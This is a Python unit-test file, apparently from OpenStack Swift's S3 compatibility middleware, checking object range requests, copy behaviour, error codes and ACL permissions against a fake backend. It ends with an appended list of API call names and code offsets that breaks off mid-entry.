self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServiceUnavailable, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
def test_object_HEAD(self):
self._test_object_GETorHEAD('HEAD')
def _test_object_HEAD_Range(self, range_value):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': range_value,
'Date': self.get_date_header()})
return self.call_s3api(req)
@s3acl
def test_object_HEAD_Range_with_invalid_value(self):
range_value = ''
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'hoge'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes='
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-10'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '416')
@s3acl
def test_object_HEAD_Range(self):
# update response headers
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
range_value = 'bytes=0-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=3-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '1')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 3-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=1-'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 1-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '3')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 2-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
@s3acl
def test_object_GET_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'PreconditionFailed')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
@s3acl
def test_object_GET(self):
self._test_object_GETorHEAD('GET')
@s3acl(s3acl_only=True)
def test_object_GET_with_s3acl_and_keystone(self):
# for passing keystone authentication root
fake_auth = self.swift._fake_auth_middleware
with patch.object(FakeSwift, '_fake_auth_middleware',
_wrap_fake_auth_middleware(fake_auth)):
self._test_object_GETorHEAD('GET')
_, _, headers = self.swift.calls_with_headers[-1]
self.assertNotIn('Authorization', headers)
_, _, headers = self.swift.calls_with_headers[0]
self.assertNotIn('Authorization', headers)
@s3acl
def test_object_GET_Range(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': 'bytes=0-3',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
@s3acl
def test_object_GET_Range_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPRequestedRangeNotSatisfiable)
self.assertEqual(code, 'InvalidRange')
@s3acl
def test_object_GET_Response(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET',
'QUERY_STRING':
'response-content-type=%s&'
'response-content-language=%s&'
'response-expires=%s&'
'response-cache-control=%s&'
'response-content-disposition=%s&'
'response-content-encoding=%s&'
% ('text/plain', 'en',
'Fri, 01 Apr 2014 12:00:00 GMT',
'no-cache',
'attachment',
'gzip')},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-type' in headers)
self.assertEqual(headers['content-type'], 'text/plain')
self.assertTrue('content-language' in headers)
self.assertEqual(headers['content-language'], 'en')
self.assertTrue('expires' in headers)
self.assertEqual(headers['expires'], 'Fri, 01 Apr 2014 12:00:00 GMT')
self.assertTrue('cache-control' in headers)
self.assertEqual(headers['cache-control'], 'no-cache')
self.assertTrue('content-disposition' in headers)
self.assertEqual(headers['content-disposition'],
'attachment')
self.assertTrue('content-encoding' in headers)
self.assertEqual(headers['content-encoding'], 'gzip')
@s3acl
def test_object_PUT_error(self):
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestEntityTooLarge)
self.assertEqual(code, 'EntityTooLarge')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnprocessableEntity)
self.assertEqual(code, 'BadDigest')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPLengthRequired)
self.assertEqual(code, 'MissingContentLength')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': ''})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?foo=bar'})
self.assertEqual(code, 'InvalidArgument')
        # adding other query parameters will cause an error
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo&bar=baz'})
self.assertEqual(code, 'InvalidArgument')
        # ...even if versionId appears last
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?bar=baz&versionId=foo'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo'})
self.assertEqual(code, 'NotImplemented')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/src_bucket/src_object',
'X-Amz-Copy-Source-Range': 'bytes=0-0'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestTimeout)
self.assertEqual(code, 'RequestTimeout')
@s3acl
def test_object_PUT(self):
etag = self.response_headers['etag']
content_md5 = etag.decode('hex').encode('base64').strip()
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'x-amz-storage-class': 'STANDARD',
'Content-MD5': content_md5,
'Date': self.get_date_header()},
body=self.object_body)
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
# Check that s3api returns an etag header.
self.assertEqual(headers['etag'], '"%s"' % etag)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that s3api converts a Content-MD5 header into an etag.
self.assertEqual(headers['etag'], etag)
def test_object_PUT_headers(self):
content_md5 = self.etag.decode('hex').encode('base64').strip()
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
swob.HTTPOk, {'last-modified': self.last_modified},
None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'X-Amz-Storage-Class': 'STANDARD',
'X-Amz-Meta-Something': 'oh hai',
'X-Amz-Meta-Unreadable-Prefix': '\x04w',
'X-Amz-Meta-Unreadable-Suffix': 'h\x04',
'X-Amz-Meta-Lots-Of-Unprintable': 5 * '\x04',
'X-Amz-Copy-Source': '/some/source',
'Content-MD5': content_md5,
'Date': self.get_date_header()})
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_s3api(req)
        # Check that s3api does not return an etag header when a copy source
        # is specified.
self.assertTrue(headers.get('etag') is None)
# Check that s3api does not return custom metadata in response
self.assertTrue(headers.get('x-amz-meta-something') is None)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that s3api converts a Content-MD5 header into an etag.
self.assertEqual(headers['ETag'], self.etag)
self.assertEqual(headers['X-Object-Meta-Something'], 'oh hai')
self.assertEqual(headers['X-Object-Meta-Unreadable-Prefix'],
'=?UTF-8?Q?=04w?=')
self.assertEqual(headers['X-Object-Meta-Unreadable-Suffix'],
'=?UTF-8?Q?h=04?=')
self.assertEqual(headers['X-Object-Meta-Lots-Of-Unprintable'],
'=?UTF-8?B?BAQEBAQ=?=')
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
def _test_object_PUT_copy(self, head_resp, put_header=None,
src_path='/some/source', timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy(src_path, put_header, timestamp)
def _test_object_PUT_copy_self(self, head_resp,
put_header=None, timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy('/bucket/object', put_header, timestamp)
def _call_object_copy(self, src_path, put_header, timestamp=None):
put_headers = {'Authorization': 'AWS test:tester:hmac',
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()}
put_headers.update(put_header)
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers)
req.date = datetime.now()
req.content_type = 'text/plain'
timestamp = timestamp or time.time()
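        # Pin the middleware's clock so that the LastModified value it
        # computes is deterministic and comparable against the expected
        # timestamp.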
with patch('swift.common.middleware.s3api.utils.time.time',
return_value=timestamp):
return self.call_s3api(req)
@s3acl
def test_object_PUT_copy(self):
def do_test(src_path=None):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
status, headers, body = self._test_object_PUT_copy(
swob.HTTPOk, put_header={'Date': date_header},
timestamp=timestamp, src_path=src_path)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
self.assertTrue(headers.get('x-amz-meta-something') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
do_test('/some/source')
do_test('/some/source?')
do_test('/some/source?versionId=null')
# Some clients (like Boto) don't include the leading slash;
# AWS seems to tolerate this so we should, too
do_test('some/source')
@s3acl
def test_object_PUT_copy_self(self):
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_copy(self):
header = {'x-amz-metadata-directive': 'COPY'}
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_replace(self):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
header = {'x-amz-metadata-directive': 'REPLACE',
'Date': date_header}
status, headers, body = self._test_object_PUT_copy_self(
swob.HTTPOk, header, timestamp=timestamp)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/bucket/object')
self.assertEqual(headers['Content-Length'], '0')
@s3acl
def test_object_PUT_copy_headers_error(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-None-Match': etag}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-Modified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = \
{'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
def test_object_PUT_copy_headers_with_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 3)
        # After the copy-source check succeeds in the s3acl case,
        # s3api checks the bucket write permissions of the destination.
_, _, headers = self.swift.calls_with_headers[-2]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
def test_object_PUT_copy_headers_with_not_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_not_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
        # After the copy-source check succeeds in the s3acl case,
        # s3api checks the bucket write permissions of the destination.
self.assertEqual(len(self.swift.calls_with_headers), 3)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl
def test_object_POST_error(self):
code = self._test_method_error('POST', '/bucket/object', None)
self.assertEqual(code, 'NotImplemented')
@s3acl
def test_object_DELETE_error(self):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
with patch(
'swift.common.middleware.s3api.s3request.get_container_info',
return_value={'status': 204}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
with patch(
'swift.common.middleware.s3api.s3request.get_container_info',
return_value={'status': 404}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
@s3acl
def test_object_DELETE_no_multipart(self):
self.s3api.conf.allow_multipart_uploads = False
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertNotIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_object_DELETE_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_slo_object_DELETE(self):
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk,
{'x-static-large-object': 'True'},
None)
self.swift.register('DELETE', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, {}, '<SLO delete results>')
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header(),
'Content-Type': 'foo/bar'})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertEqual(body, '')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'
'?multipart-manifest=delete'),
self.swift.calls)
_, path, headers = self.swift.calls_with_headers[-1]
path, query_string = path.split('?', 1)
query = {}
for q in query_string.split('&'):
key, arg = q.split('=')
query[key] = arg
self.assertEqual(query['multipart-manifest'], 'delete')
self.assertNotIn('Content-Type', headers)
def _test_object_for_s3acl(self, method, account):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS %s:hmac' % account,
'Date': self.get_date_header()})
return self.call_s3api(req)
def _test_set_container_permission(self, account, permission):
grants = [Grant(User(account), permission)]
headers = \
encode_acl('container',
ACL(Owner('test:tester', 'test:tester'), grants))
self.swift.register('HEAD', '/v1/AUTH_test/bucket',
swob.HTTPNoContent, headers, None)
@s3acl(s3acl_only=True)
def test_object_GET_without_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_GET_with_read_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:read')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_GET_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_for_s3acl('GET', 'test:full_control')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_without_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_PUT_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = \
self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_DELETE_without_permission(self):
account = 'test:other'
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('DELETE',
'test:tester')
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = self._test_object_for_s3acl('DELETE', account)
self.assertEqual(status.split()[0], '204')
def _test_object_copy_for_s3acl(self, account, src_permission=None,
src_path='/src_bucket/src_obj'):
owner = 'test:tester'
grants = [Grant(User(account), src_permission)] \
if src_permission else [Grant(User(owner), 'FULL_CONTROL')]
src_o_headers = \
encode_acl('object', ACL(Owner(owner, owner), grants))
src_o_headers.update({'last-modified': self.last_modified})
self.swift.register(
'HEAD', join('/v1/AUTH_test', src_path.lstrip('/')),
swob.HTTPOk, src_o_headers, None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS %s:hmac' % account,
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()})
return self.call_s3api(req)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_owner_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:full_control',
'FULL_CONTROL')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_grantee_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write', 'READ')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_src_obj_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_dst_container_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:other', 'READ')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_empty_src_path(self):
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self._test_object_copy_for_s3acl(
'test:write', 'READ', src_path='')
self.assertEqual(status.split()[0], '400')
class TestS3ApiObjNonUTC(TestS3ApiObj):
def setUp(self):
self.orig_tz = os.environ.get('TZ', '')
os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'
time.tzset()
super(TestS3ApiObjNonUTC, self).setUp()
def tearDown(self):
super(TestS3ApiObjNonUTC, self).tearDown()
os.environ['TZ'] = self.orig_tz
time.tzset()
if __name__ == '__main__':
unittest.main()
| [
"swift.common.middleware.s3api.subresource.User",
"mock.patch",
"hashlib.md5",
"swift.common.middleware.s3api.etree.fromstring",
"time.tzset",
"os.environ.get",
"datetime.datetime.now",
"swift.common.swob.Request.blank",
"swift.common.middleware.s3api.subresource.Owner",
"swift.common.middleware.s3api.utils.S3Timestamp",
"time.time",
"unittest.main",
"swift.common.middleware.s3api.utils.mktime",
"test.unit.common.middleware.s3api.test_s3_acl.s3acl"
]
| [((13899, 13921), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (13904, 13921), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((32337, 32359), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (32342, 32359), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((34580, 34602), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (34585, 34602), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41001, 41023), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41006, 41023), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41290, 41312), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41295, 41312), False, 'from test.unit.common.middleware.s3api.test_s3_acl import 